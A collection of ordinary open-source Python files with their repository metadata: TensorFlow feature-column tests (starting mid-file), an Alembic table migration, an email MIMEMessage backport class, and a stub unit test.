output, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [real_valued, bucket, hashed_sparse, crossed],
num_outputs=5)
with self.test_session():
tf.initialize_all_variables().run()
self.assertAllEqual(output.eval().shape, [3, 5])
def testPredictions(self):
language = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "finnish", "hindi"])
age = tf.contrib.layers.real_valued_column("age")
with tf.Graph().as_default():
features = {
"age": tf.constant([[1], [2]]),
"language": tf.SparseTensor(values=["hindi", "english"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
}
output, column_to_variable, bias = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[age, language],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
self.assertAllClose(output.eval(), [[0.], [0.]])
sess.run(bias.assign([0.1]))
self.assertAllClose(output.eval(), [[0.1], [0.1]])
# score: 0.1 + age*0.1
sess.run(column_to_variable[age][0].assign([[0.2]]))
self.assertAllClose(output.eval(), [[0.3], [0.5]])
# score: 0.1 + age*0.1 + language_weight[language_index]
sess.run(column_to_variable[language][0].assign([[0.1], [0.3], [0.2]]))
self.assertAllClose(output.eval(), [[0.5], [0.6]])
def testPredictionsWithMultivalentColumnButNoCross(self):
language = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "turkish", "hindi"])
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["hindi", "english"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, bias = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[language],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
# score: 0.1 + language_weight['hindi'] + language_weight['english']
sess.run(bias.assign([0.1]))
sess.run(column_to_variable[language][0].assign([[0.1], [0.3], [0.2]]))
self.assertAllClose(output.eval(), [[0.4]])
def testSparseFeatureColumnWithHashedBucketSize(self):
movies = tf.contrib.layers.sparse_column_with_hash_bucket(
column_name="movies", hash_bucket_size=15)
with tf.Graph().as_default():
features = {
"movies": tf.SparseTensor(
values=["matrix", "head-on", "winter sleep"],
indices=[[0, 0], [0, 1], [1, 0]],
shape=[2, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[movies],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[movies][0]
self.assertEqual(weights.get_shape(), (15, 1))
sess.run(weights.assign(weights + 0.4))
# score for first example = 0.4 (matrix) + 0.4 (head-on) = 0.8
# score for second example = 0.4 (winter sleep)
self.assertAllClose(output.eval(), [[0.8], [0.4]])
def testCrossUsageInPredictions(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[2, 1])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country_language],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_language][0]
sess.run(weights.assign(weights + 0.4))
self.assertAllClose(output.eval(), [[0.4], [0.4]])
def testCrossColumnByItself(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
language_language = tf.contrib.layers.crossed_column(
[language, language], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [language_language],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[language_language][0]
sess.run(weights.assign(weights + 0.4))
# There are two features inside language. If we cross it by itself we'll
# have four crossed features.
self.assertAllClose(output.eval(), [[1.6]])
def testMultivalentCrossUsageInPredictions(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country_language],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_language][0]
sess.run(weights.assign(weights + 0.4))
# There are four crosses each with 0.4 weight.
# score = 0.4 + 0.4 + 0.4 + 0.4
self.assertAllClose(output.eval(), [[1.6]])
def testMultivalentCrossUsageInPredictionsWithPartition(self):
# bucket size has to be big enough to allwo sharding.
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=64 << 19)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=64 << 18)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=64 << 18)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country, language, country_language],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
self.assertEqual(2, len(column_to_variable[country]))
self.assertEqual(3, len(column_to_variable[language]))
self.assertEqual(2, len(column_to_variable[country_language]))
weights = column_to_variable[country_language]
for partition_variable in weights:
sess.run(partition_variable.assign(partition_variable + 0.4))
# There are four crosses each with 0.4 weight.
# score = 0.4 + 0.4 + 0.4 + 0.4
self.assertAllClose(output.eval(), [[1.6]])
def testRealValuedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
age = tf.contrib.layers.real_valued_column("age")
# The following RealValuedColumn has 3 dimensions.
incomes = tf.contrib.layers.real_valued_column("incomes", 3)
with tf.Graph().as_default():
features = {"age": tf.constant([[1], [1]]),
"incomes": tf.constant([[100., 200., 300.], [10., 20., 30.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[2, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country, age, incomes],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
incomes_weights = column_to_variable[incomes][0]
sess.run(incomes_weights.assign([[0.1], [0.2], [0.3]]))
self.assertAllClose(output.eval(), [[140.], [14.]])
def testMulticlassWithRealValuedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
age = tf.contrib.layers.real_valued_column("age")
# The following RealValuedColumn has 3 dimensions.
incomes = tf.contrib.layers.real_valued_column("incomes", 3)
with tf.Graph().as_default():
features = {"age": tf.constant([[1], [1]]),
"incomes": tf.constant([[100., 200., 300.], [10., 20., 30.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[2, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country, age, incomes],
num_outputs=5))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
incomes_weights = column_to_variable[incomes][0]
sess.run(incomes_weights.assign([[0.01, 0.1, 1., 10., 100.],
[0.02, 0.2, 2., 20., 200.],
[0.03, 0.3, 3., 30., 300.]]))
self.assertAllClose(output.eval(), [[14., 140., 1400., 14000., 140000.],
[1.4, 14., 140., 1400., 14000.]])
def testBucketizedColumn(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
with tf.Graph().as_default():
# buckets 2, 3, 0
features = {"price": tf.constant([[20.], [110], [-3]])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[bucket],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
sess.run(column_to_variable[bucket][0].assign([[0.1], [0.2], [0.3], [0.4
]]))
self.assertAllClose(output.eval(), [[0.3], [0.4], [0.1]])
def testBucketizedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
with tf.Graph().as_default():
# buckets 2, 3, 0
features = {"price": tf.constant([[20., 210], [110, 50], [-3, -30]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[3, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[bucket, country],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
# dimension = 2, bucket_size = 4, num_classes = 1
sess.run(column_to_variable[bucket][0].assign(
[[0.1], [0.2], [0.3], [0.4], [1], [2], [3], [4]]))
self.assertAllClose(output.eval(), [[0.3 + 4], [0.4 + 3], [0.1 + 1]])
def testMulticlassWithBucketizedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
with tf.Graph().as_default():
# buckets 2, 3, 0
features = {"price": tf.constant([[20., 210], [110, 50], [-3, -30]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[3, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[bucket, country],
num_outputs=5))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
# dimension = 2, bucket_size = 4, num_classes = 5
sess.run(column_to_variable[bucket][0].assign(
[[0.1, 1, 10, 100, 1000], [0.2, 2, 20, 200, 2000],
[0.3, 3, 30, 300, 3000], [0.4, 4, 40, 400, 4000],
[5, 50, 500, 5000, 50000], [6, 60, 600, 6000, 60000],
[7, 70, 700, 7000, 70000], [8, 80, 800, 8000, 80000]]))
self.assertAllClose(
output.eval(),
[[0.3 + 8, 3 + 80, 30 + 800, 300 + 8000, 3000 + 80000],
[0.4 + 7, 4 + 70, 40 + 700, 400 + 7000, 4000 + 70000],
[0.1 + 5, 1 + 50, 10 + 500, 100 + 5000, 1000 + 50000]])
def testCrossWithBucketizedColumn(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_price = tf.contrib.layers.crossed_column(
[country, price_bucket], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[country_price],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_price][0]
sess.run(weights.assign(weights + 0.4))
# There are two crosses each with 0.4 weight.
# score = 0.4 + 0.4
self.assertAllClose(output.eval(), [[0.8]])
def testCrossWithCrossedColumn(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=10)
country_language_price = tf.contrib.layers.crossed_column(
set([country_language, price_bucket]),
hash_bucket_size=15)
with tf.Graph().as_default():
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country_language_price],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_language_price][0]
sess.run(weights.assign(weights + 0.4))
# There are two crosses each with 0.4 weight.
# score = 0.4 + 0.4 + 0.4 + 0.4
self.assertAllClose(output.eval(), [[1.6]])
def testIntegerizedColumn(self):
product = tf.contrib.layers.sparse_column_with_integerized_feature(
"product", bucket_size=5)
with tf.Graph().as_default():
features = {"product": tf.SparseTensor(values=[0, 4, 2],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[product],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
product_weights = column_to_variable[product][0]
sess.run(product_weights.assign([[0.1], [0.2], [0.3], [0.4], [0.5]]))
self.assertAllClose(output.eval(), [[0.1], [0.5], [0.3]])
def testIntegerizedColumnWithInvalidId(self):
product = tf.contrib.layers.sparse_column_with_integerized_feature(
"product", bucket_size=5)
with tf.Graph().as_default():
features = {"product": tf.SparseTensor(values=[5, 4, 7],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[product],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
product_weights = column_to_variable[product][0]
sess.run(product_weights.assign([[0.1], [0.2], [0.3], [0.4], [0.5]]))
self.assertAllClose(output.eval(), [[0.1], [0.5], [0.3]])
  def testMulticlassWithOnlyBias(self):
    """With weights left at zero, each example's output equals the bias."""
    with tf.Graph().as_default():
      features = {"age": tf.constant([[10.], [20.], [30.], [40.]])}
      output, _, bias = tf.contrib.layers.weighted_sum_from_feature_columns(
          features, [tf.contrib.layers.real_valued_column("age")],
          num_outputs=3)
      with self.test_session() as sess:
        tf.initialize_all_variables().run()
        tf.initialize_all_tables().run()
        sess.run(bias.assign([0.1, 0.2, 0.3]))
        # Weights stay at their zero initialization, so every row is the bias.
        self.assertAllClose(output.eval(), [[0.1, 0.2, 0.3], [0.1, 0.2, 0.3],
                                            [0.1, 0.2, 0.3], [0.1, 0.2, 0.3]])
  def testMulticlassWithRealValuedColumn(self):
    """Real-valued column with num_outputs=3 yields score = value * weights."""
    with tf.Graph().as_default():
      column = tf.contrib.layers.real_valued_column("age")
      features = {"age": tf.constant([[10.], [20.], [30.], [40.]])}
      output, column_to_variable, _ = (
          tf.contrib.layers.weighted_sum_from_feature_columns(features,
                                                              [column],
                                                              num_outputs=3))
      with self.test_session() as sess:
        tf.initialize_all_variables().run()
        tf.initialize_all_tables().run()
        weights = column_to_variable[column][0]
        # One input dimension, three output classes.
        self.assertEqual(weights.get_shape(), (1, 3))
        sess.run(weights.assign([[0.01, 0.03, 0.05]]))
        # e.g. first row: 10 * [0.01, 0.03, 0.05] = [0.1, 0.3, 0.5].
        self.assertAllClose(output.eval(), [[0.1, 0.3, 0.5], [0.2, 0.6, 1.0],
                                            [0.3, 0.9, 1.5], [0.4, 1.2, 2.0]])
  def testMulticlassWithSparseColumn(self):
    """Keyed sparse column: each example selects the weight row of its key id."""
    with tf.Graph().as_default():
      column = tf.contrib.layers.sparse_column_with_keys(
          column_name="language",
          keys=["english", "arabic", "hindi", "russian", "swahili"])
      features = {
          "language": tf.SparseTensor(
              values=["hindi", "english", "arabic", "russian"],
              indices=[[0, 0], [1, 0], [2, 0], [3, 0]],
              shape=[4, 1])
      }
      output, column_to_variable, _ = (
          tf.contrib.layers.weighted_sum_from_feature_columns(features,
                                                              [column],
                                                              num_outputs=3))
      with self.test_session() as sess:
        tf.initialize_all_variables().run()
        tf.initialize_all_tables().run()
        weights = column_to_variable[column][0]
        # Five keys, three output classes.
        self.assertEqual(weights.get_shape(), (5, 3))
        sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
                                 [0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
                                                                    1.1]]))
        # Inputs map to key ids 2, 0, 1, 3, hence weight rows 2, 0, 1, 3.
        self.assertAllClose(output.eval(), [[0.3, 0.6, 0.9], [0.1, 0.4, 0.7],
                                            [0.2, 0.5, 0.8], [0.4, 0.7, 1.0]])
  def testMulticlassWithBucketizedColumn(self):
    """Bucketized column: each price selects the weight row of its bucket."""
    column = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column("price"),
        boundaries=[0., 100., 500., 1000.])
    with tf.Graph().as_default():
      # buckets 0, 2, 1, 2
      features = {"price": tf.constant([[-3], [110], [20.], [210]])}
      output, column_to_variable, _ = (
          tf.contrib.layers.weighted_sum_from_feature_columns(features,
                                                              [column],
                                                              num_outputs=3))
      with self.test_session() as sess:
        tf.initialize_all_variables().run()
        tf.initialize_all_tables().run()
        weights = column_to_variable[column][0]
        # Four boundaries produce five buckets; three output classes.
        self.assertEqual(weights.get_shape(), (5, 3))
        sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
                                 [0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
                                                                    1.1]]))
        # Rows correspond to buckets 0, 2, 1, 2 from the comment above.
        self.assertAllClose(output.eval(), [[0.1, 0.4, 0.7], [0.3, 0.6, 0.9],
                                            [0.2, 0.5, 0.8], [0.3, 0.6, 0.9]])
  def testMulticlassWithCrossedColumn(self):
    """Crossed column with num_outputs=3: only the output shape is checked,
    since the crossed bucket ids depend on the hash function."""
    language = tf.contrib.layers.sparse_column_with_hash_bucket(
        "language", hash_bucket_size=3)
    country = tf.contrib.layers.sparse_column_with_hash_bucket(
        "country", hash_bucket_size=2)
    column = tf.contrib.layers.crossed_column(
        {language, country}, hash_bucket_size=5)
    with tf.Graph().as_default():
      features = {
          "language": tf.SparseTensor(
              values=["english", "spanish", "russian", "swahili"],
              indices=[[0, 0], [1, 0], [2, 0], [3, 0]],
              shape=[4, 1]),
          "country": tf.SparseTensor(values=["US", "SV", "RU", "KE"],
                                     indices=[[0, 0], [1, 0], [2, 0], [3, 0]],
                                     shape=[4, 1])
      }
      output, column_to_variable, _ = (
          tf.contrib.layers.weighted_sum_from_feature_columns(features,
                                                              [column],
                                                              num_outputs=3))
      with self.test_session() as sess:
        tf.initialize_all_variables().run()
        tf.initialize_all_tables().run()
        weights = column_to_variable[column][0]
        self.assertEqual(weights.get_shape(), (5, 3))
        sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
                                 [0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
                                                                    1.1]]))
        # 4 examples x 3 classes.
        self.assertAllClose(tf.shape(output).eval(), [4, 3])
  def testMulticlassWithMultivalentColumn(self):
    """Multivalent sparse column: weight rows of all values in a row are summed."""
    column = tf.contrib.layers.sparse_column_with_keys(
        column_name="language",
        keys=["english", "turkish", "hindi", "russian", "swahili"])
    with tf.Graph().as_default():
      features = {
          "language": tf.SparseTensor(
              values=["hindi", "english", "turkish", "turkish", "english"],
              indices=[[0, 0], [0, 1], [1, 0], [2, 0], [3, 0]],
              shape=[4, 2])
      }
      output, column_to_variable, _ = (
          tf.contrib.layers.weighted_sum_from_feature_columns(features,
                                                              [column],
                                                              num_outputs=3))
      with self.test_session() as sess:
        tf.initialize_all_variables().run()
        tf.initialize_all_tables().run()
        weights = column_to_variable[column][0]
        self.assertEqual(weights.get_shape(), (5, 3))
        sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
                                 [0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
                                                                    1.1]]))
        # First example has two values ("hindi" + "english"), so its score is
        # the sum of weight rows 2 and 0: [0.4, 1.0, 1.6].
        self.assertAllClose(output.eval(), [[0.4, 1.0, 1.6], [0.2, 0.5, 0.8],
                                            [0.2, 0.5, 0.8], [0.1, 0.4, 0.7]])
  def testVariablesAddedToCollection(self):
    """weight_collections places all created variables in the named collection."""
    price_bucket = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column("price"),
        boundaries=[0., 10., 100.])
    country = tf.contrib.layers.sparse_column_with_hash_bucket(
        "country", hash_bucket_size=5)
    country_price = tf.contrib.layers.crossed_column(
        [country, price_bucket], hash_bucket_size=10)
    with tf.Graph().as_default():
      features = {
          "price": tf.constant([[20.]]),
          "country": tf.SparseTensor(values=["US", "SV"],
                                     indices=[[0, 0], [0, 1]],
                                     shape=[1, 2])
      }
      tf.contrib.layers.weighted_sum_from_feature_columns(
          features, [country_price, price_bucket],
          num_outputs=1,
          weight_collections=["my_collection"])
      weights = tf.get_collection("my_collection")
      # 3 = bias + price_bucket + country_price
      self.assertEqual(3, len(weights))
class ParseExampleTest(tf.test.TestCase):
  """Tests for parse_feature_columns_from_examples."""

  def testParseExample(self):
    """Parsing a serialized Example yields one tensor per feature column."""
    bucket = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column("price", dimension=3),
        boundaries=[0., 10., 100.])
    wire_cast = tf.contrib.layers.sparse_column_with_keys(
        "wire_cast", ["marlo", "omar", "stringer"])
    # buckets 2, 3, 0
    data = tf.train.Example(features=tf.train.Features(feature={
        "price": tf.train.Feature(float_list=tf.train.FloatList(value=[20., 110,
                                                                       -3])),
        "wire_cast": tf.train.Feature(bytes_list=tf.train.BytesList(value=[
            b"stringer", b"marlo"
        ])),
    }))
    output = tf.contrib.layers.parse_feature_columns_from_examples(
        serialized=[data.SerializeToString()],
        feature_columns=[bucket, wire_cast])
    # The result is keyed by feature column, one entry per requested column.
    self.assertIn(bucket, output)
    self.assertIn(wire_cast, output)
    with self.test_session():
      tf.initialize_all_tables().run()
      self.assertAllEqual(output[bucket].eval(), [[2, 3, 0]])
      self.assertAllEqual(output[wire_cast].indices.eval(), [[0, 0], [0, 1]])
      # "stringer" and "marlo" map to key ids 2 and 0.
      self.assertAllEqual(output[wire_cast].values.eval(), [2, 0])
class InferRealValuedColumnTest(tf.test.TestCase):
  """Tests for infer_real_valued_columns."""

  def testTensor(self):
    """A single dense tensor maps to one unnamed real-valued column."""
    self.assertEqual(
        tf.contrib.layers.infer_real_valued_columns(
            tf.zeros(shape=[33, 4], dtype=tf.int32)),
        [tf.contrib.layers.real_valued_column("", dimension=4, dtype=tf.int32)])

  def testDictionary(self):
    """A dict of tensors maps to one column per key, keeping dtype/dimension."""
    self.assertItemsEqual(
        tf.contrib.layers.infer_real_valued_columns({
            "a": tf.zeros(shape=[33, 4], dtype=tf.int32),
            "b": tf.zeros(shape=[3, 2], dtype=tf.float32)
        }),
        [tf.contrib.layers.real_valued_column(
            "a", dimension=4, dtype=tf.int32),
         tf.contrib.layers.real_valued_column(
             "b", dimension=2, dtype=tf.float32)])

  def testNotGoodDtype(self):
    """Non-numeric dtypes (string) are rejected."""
    with self.assertRaises(ValueError):
      tf.contrib.layers.infer_real_valued_columns(
          tf.constant([["a"]], dtype=tf.string))

  def testSparseTensor(self):
    """Sparse tensors cannot be inferred as real-valued columns."""
    with self.assertRaises(ValueError):
      tf.contrib.layers.infer_real_valued_columns(
          tf.SparseTensor(indices=[[0, 0]], values=["a"], shape=[1, 1]))
if __name__ == "__main__":
  tf.test.main()  # Run all test cases defined in this module.
| {
"content_hash": "36be26bc97c6af981751618e4625d03b",
"timestamp": "",
"source": "github",
"line_count": 1117,
"max_line_length": 80,
"avg_line_length": 47.42614145031334,
"alnum_prop": 0.5427277017461066,
"repo_name": "dhalleine/tensorflow",
"id": "d36e369ef76fb45af5d138a168af52e6d57f3fbf",
"size": "53664",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/layers/python/layers/feature_column_ops_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "152404"
},
{
"name": "C++",
"bytes": "7305808"
},
{
"name": "CMake",
"bytes": "29325"
},
{
"name": "CSS",
"bytes": "107"
},
{
"name": "HTML",
"bytes": "677843"
},
{
"name": "Java",
"bytes": "50361"
},
{
"name": "JavaScript",
"bytes": "16098"
},
{
"name": "Jupyter Notebook",
"bytes": "777976"
},
{
"name": "Objective-C",
"bytes": "1288"
},
{
"name": "Protocol Buffer",
"bytes": "101759"
},
{
"name": "Python",
"bytes": "4184469"
},
{
"name": "Shell",
"bytes": "77957"
},
{
"name": "TypeScript",
"bytes": "328956"
}
],
"symlink_target": ""
} |
"""added psysuite apk management
Revision ID: 1322ec780acd
Revises: 8ee4d82ef1a1
Create Date: 2020-07-30 16:27:14.595064
"""
# Revision identifiers, used by Alembic to order migrations in the chain.
revision = '1322ec780acd'
down_revision = '8ee4d82ef1a1'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Create the ``psysuite_mobile_application`` table.

    Holds one row per released APK: an integer ``version`` (unique), a
    human-readable ``sver`` string, a free-form ``description`` and the
    path to the APK file on disk.
    """
    # Originally auto-generated by Alembic autogenerate.
    op.create_table(
        'psysuite_mobile_application',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('version', sa.Integer(), nullable=False),
        sa.Column('sver', sa.String(), nullable=True),
        sa.Column('description', sa.String(), nullable=True),
        sa.Column('apk_path', sa.String(), nullable=True),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('version'),
    )
def downgrade():
    """Reverse :func:`upgrade` by dropping the table again."""
    # Originally auto-generated by Alembic autogenerate.
    op.drop_table('psysuite_mobile_application')
| {
"content_hash": "10634da2385b9cd18f6a01d547f74c5d",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 63,
"avg_line_length": 27.970588235294116,
"alnum_prop": 0.6855941114616193,
"repo_name": "allspeak/api.allspeak.eu",
"id": "c32faa8d99205d17f502b05c70e5f69dd82cbed7",
"size": "951",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "web/migrations/versions/1322ec780acd_added_psysuite_apk_management.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "542"
},
{
"name": "Dockerfile",
"bytes": "337"
},
{
"name": "HTML",
"bytes": "15330"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "132944"
},
{
"name": "Shell",
"bytes": "697"
}
],
"symlink_target": ""
} |
"""Class representing message/* MIME documents."""
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
__all__ = ['MIMEMessage']
from future.backports.email import message
from future.backports.email.mime.nonmultipart import MIMENonMultipart
class MIMEMessage(MIMENonMultipart):
    """Class representing message/* MIME documents."""

    def __init__(self, _msg, _subtype='rfc822'):
        """Create a message/* type MIME document.

        ``_msg`` must be an instance of Message (or a subclass); otherwise
        a TypeError is raised.

        ``_subtype`` names the subtype of the contained message.  The
        default is "rfc822", the name used by the MIME standard even
        though that RFC has since been superseded by RFC 2822.
        """
        MIMENonMultipart.__init__(self, 'message', _subtype)
        if not isinstance(_msg, message.Message):
            raise TypeError('Argument is not an instance of Message')
        # Call the base Message.attach directly; using the inherited
        # override here would raise an exception instead.
        message.Message.attach(self, _msg)
        # Make sure get_default_type() reports the proper content type.
        self.set_default_type('message/rfc822')
| {
"content_hash": "8fd6fb375576f137226bc3c20f85fedc",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 78,
"avg_line_length": 41.03030303030303,
"alnum_prop": 0.6646971935007385,
"repo_name": "agincel/AdamTestBot",
"id": "f53bd78a8b8ad4c0ef0b7cc5fe6d1c06fae7d08b",
"size": "1465",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "future/backports/email/mime/message.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "54"
},
{
"name": "Python",
"bytes": "3462168"
},
{
"name": "Shell",
"bytes": "406"
}
],
"symlink_target": ""
} |
"""
test_section
------------
Tests for `section` models module.
"""
import os
import shutil
import unittest
from section import models
class TestSection(unittest.TestCase):
    """Placeholder test case for the ``section.models`` module."""

    def setUp(self):
        """No fixtures required yet."""
        pass

    def test_something(self):
        """Stub test; add real assertions against ``models`` here."""
        pass

    def tearDown(self):
        """Nothing to clean up."""
        pass
| {
"content_hash": "245c97e8d13822a4a65b9b1b7afdf503",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 37,
"avg_line_length": 12.333333333333334,
"alnum_prop": 0.6283783783783784,
"repo_name": "thongly/independent-section",
"id": "9b9c8f5cb9f9ff09ba676e0a227e7442ec3526d4",
"size": "343",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "661"
},
{
"name": "Makefile",
"bytes": "1222"
},
{
"name": "Python",
"bytes": "3874"
}
],
